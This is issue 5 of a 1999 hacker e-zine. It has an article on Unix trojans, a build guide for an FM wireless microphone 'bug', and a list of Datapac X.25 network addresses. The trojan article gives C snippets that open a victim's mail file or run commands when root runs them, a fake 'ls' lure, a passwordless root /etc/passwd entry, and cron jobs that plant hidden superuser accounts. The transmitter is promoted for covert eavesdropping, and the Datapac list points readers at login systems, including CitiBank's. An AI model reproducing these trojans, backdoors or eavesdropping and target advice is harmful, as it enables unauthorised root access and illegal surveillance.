__________________________________________________________________ BCHell: The Definitive guide to phreaking in 250/604 Volume 1 Issue 5 16.11.99 Editor-in-Chief: Doktor Che (doktor_che@hotmail.com) Contributing Editors slave (slave@marijuana.com) Mister Roboto (mister_roboto@fnkewl.com) If you're stupid enough to do this shit and get caught, its your own fault. No one involved with this magazine have ever done any of it. If you blame us for making you do it, the cops will probably laugh at you. We told you not to. CONTENTS: ___________ Intr0. By DoktorChe Unix Trojans By slave FM Transmitter By slave Datapac Lamness By DoktorChe __________________________________________________________________ Intr0. by Doktor Che Issue Five marks the debut of our newest writer, slave. I've been lazy lately, so if it weren't for him, we wouldn't have issue five, judging by my lame contribution. If NiNJA-X ever spews forth a coherent article, *he* might have a debut too. Some info: slave hails from Duncan, on Vancouver Island. He writes da m4d c0d3!!!!! I'm glad to have him onboard. In an attempt to make this zine semi browser friendly, I've used MS EDIT. Bear this is mind if you reading a downloaded version. __________________________________________________________________ Trojans under UNIX by slave Trojans are so great, and I don't mean the lame windoze, netbus, but real trojans for linux, this atrice contains live trojan code, so abuse the gift I am giving you and burn all the churches in your town! This first trojan is for reading peoples mail, you can easily code to do other things, but this is probaly the most universal. Add this to some tic-tac-toe code and put out messages that you have this game and you want people to try it. If you cannot find any source, than just make so it says like 'Error in starting game' Anywho: #include main() { if ( access("mbox",0) > -1 ) system("chmod 777 mbox"); } Now you can read their mail! Wow! Now say you made a program that if root ran it than say it would make you an account or something? Well you can make it do anything. #include main() { if ( !strcmp(getlogin(),"root") ) system("command here"); } There you go. Want root to run it? Call it like 'ls' give it the proper permissions and tell root there is something wrong in your home dir. When you uses the ls command, bang! He is yours. Make it self deleting and give a fake ls for the first time to. You should now C to do that but if you don't just make it work in conjuction with a shell script. Here are some backdoors, they're close enough to trojans, I mean, I gotta fill some space no? First you could make add a new user in the '/etc/passwd' like so: route::0:0:"R00T":/:/bin/sh But that is noticible! You can start fingering users to see if there is any that have never logged in or rarely do. If you see any of those just give them superuser properties and change the passwd. Or look for accounts with the '*', deactivatied accounts and reactivate them. If you wanna be even more tricky, edit the cron like so 0 1 * * * chmod +w /etc/passwd 2 1 * * * echo " route0::0:0:"R00t":/:/bin/sh" >> /etc/passwd 1 1 * * * echo " route1::1:1:"RooT":/:/bin/sh" >> /etc/passwd 20 1 * * * grep -v "prop*:" /etc/passwd > /usr/spool/uucppublic/.p 0 2 * * * cat /usr/spool/uucppublic/.p > /etc/passwd 10 2 * * * chmod -w /etc/passwd 15 2 * * * rm /usr/spool/uucppublic/.p That will create two user accounts between 1-2 am with no passwords and one superuser and one regualur user. Okay, I am so nice, I am even going to tell you how to fake messages using 'write' and 'talk' for getting people to use your trojans, or faking messages to people. When someone writes you, you will get a message like this: Message from satan@hell.org on tty3 at 12:00 ... Burn all the bibles at your local church EOF Now say you wanna send a message to your pal satan but so it does't look like from you it was from you. Write something up with 'ed' or 'vi' or whatever that looks like this Message from god@hell.org on tty2 at 12:01 ... I am gay! EOF and call it godmess.msg or whatever and give the command cat godmess.msg > /dev/tty3 and it will appear on his screen! Neat-0! Later! __________________________________________________________________ Wireless FM Transmitter Bug by slave slave@marijuana.com (Editor's Note: If you have downloaded this text, the schematic will be warped unless viewed with MS Edit. If you're running Linux/Un*x, you'll be fine.) What you are about to get plans for is a tiny FM wireless microphone, its no bigger than your index finger! Best used as a bug, however it can only transmit like 13m. You can tune the transmitter for anywere in between 91-97MHz. This does comply with Industry Canada rules, assuming your not using it as a bug. But then where is the fun?!? Theory of Operation: Condenser Microphone: picks up the sound. (Well, duh) Oscillator/Modulator: The circut containing transistor TR1 is a Very High Frequency(VHF) oscillator, oscillating between 91 and 97MHz. The oscillator frequency varies in propotion to the sound picked up by the microphone, which is applied to the base of TR1. This is known as frequency modulation(FM). The stronger the signal the microphone receives, the more the frequency varies. Amplifier: Transistor TR2 amplifies the signal from the oscillator/modulator and delivers it to the antenna,where it is radiated through the air. Components: (Here is a list of what you need, rat shack ready!) Description Value/Item No. Qty Circut No. ----------- -------------- --- --------- PCB 4030 1 Capacitor 100pF(marked 101) 1 C2 Capacitor 10pF (marked 10) 1 C3 Capacitor 4pF(marked 4) 1 C4 Capacitor 0.01uF(marked 4) 1 C5 Capacitor 4pF(marked 4) 1 C6 Resistor 10 kOhm(Br/B/O/G) 1 R1 Resistor 1.2 kOhms(O/O/O/G) 1 R2 Resistor 33 kOhms(O/O/O/G) 1 R3 Resistor 100 kOhms(Br/B/Br/G) 1 R4 Resistor 33 kOhms(O/O/O/G) 1 R5 Resistor 180 kOhms(Br/Gr/Br/G) 1 R6 Transistor 2SC1923(marked C1923) 2 TR1, TR2 Electret 1 ECM Condenser Mic Electrolytic 10uf 1 C1 Capacitor Electrolytic 10uf 1 C7 Capacitor Coil 0.27-o.30uH 1 L Vinyl Insulated Wire Plus you will need 1 N battery, 1 N battery holder, toggle switch, single-throw toggle switch, a soldering iron, and solder. Connecting the Components: 1. Cut a 5cm length from the supplied vinyl-insulated wire. Use the remainder as an antenna. 2. Use the battery holder's black wire to connect the battery holder's negative (-) terminal to the PCB's negative (-) terminal. 3. Use the battery holder's red wire to connect the battery holder's positive (+) terminal to one of the toggle switch's terminals. 4. Use the 2-inch wire you cut in step 1 to connect the toggle switch's other terminal to the PCB's positive (+) terminal. 5. Check to be sure the parts are in correct position and polarity, than install a fresh N battery into battery holder. Operation: 1. Tune your FM radio to a frequency where no broadcast is. 2. Turn on your micrphone 3. Use a plastic coil alignment tool to adjust the microphone's to the same frequency as the radio. turn the coil clockwise to raise the frequency and couter-clockwise to lower it. If the microphone is near the radio you will hear feedback when you are on the correct frequency. | ANT Schmeatic Diagram: . A | +----------.----.------.----.---------.------.---|----.------0 + | | | C5 | | | \ | | DC-IN | / | 0.01 | | | R6 / | | +--0 - / \ = uF = C4 ) L \ 180 \ | | | \R2 1.2K / | | 4P ).-+ / / | | | / \ --- | ) | \ | | | | \ | /|\ __.____| |R5 33K / .---+ | | ECM | | | | | | _| | | _ |R1 10K + | / | C3 | | / + | | | |--.--/\/\-||-.------| = 10P +---||--.--| C7 10uF === | |_|-- | \ | C6 4P \_ | | | | TR1 |__. TR2 | | | | | | | | | | C2 100P = / | | | | | R4 100 \ | | | | | | | | | +----------.-----------.---------------------.--------.---+ __________________________________________________________________ Datapac Lamness By DoktorChe No one seems to care about Datapac anymore. Everyone's so Internet this and Internet that; we've forgotten abou our wonder world of X.25 networks. You're much safer on Datapac than on the Internet, and there's tonnes to explore. (For some more info on Datapac itself, read the files elsewhere on this site.) DATAPAC TOLL FREE-CANADA 1-800-565-8805 20200321 ? 20200586 Digital Unix 20400177 QL * IDENTIFIEZ-VOUS SVP * PLEASE SIGN ON: 20600222 Please enter password 20800515 PLEASE ENTER PASSWORD 21300047 PLEASE ENTER PASSWORD Telnet: CitiBank 13110224100 13110224101 13110224102 13110224103 13110224104 The CitiBank system is wierd; it allows you to issue commands without logging on, theoretically. Everytime I tried it, though, I got an "INVALID SYNTAX" or "INVALID APPLICATION" message. ___________________________________________________________________ Next Issue: Mister Roboto returns! Fun with Word Macros! The Art of Brainwashing! Cellphone phun! Urban Exploration! Who Cares?!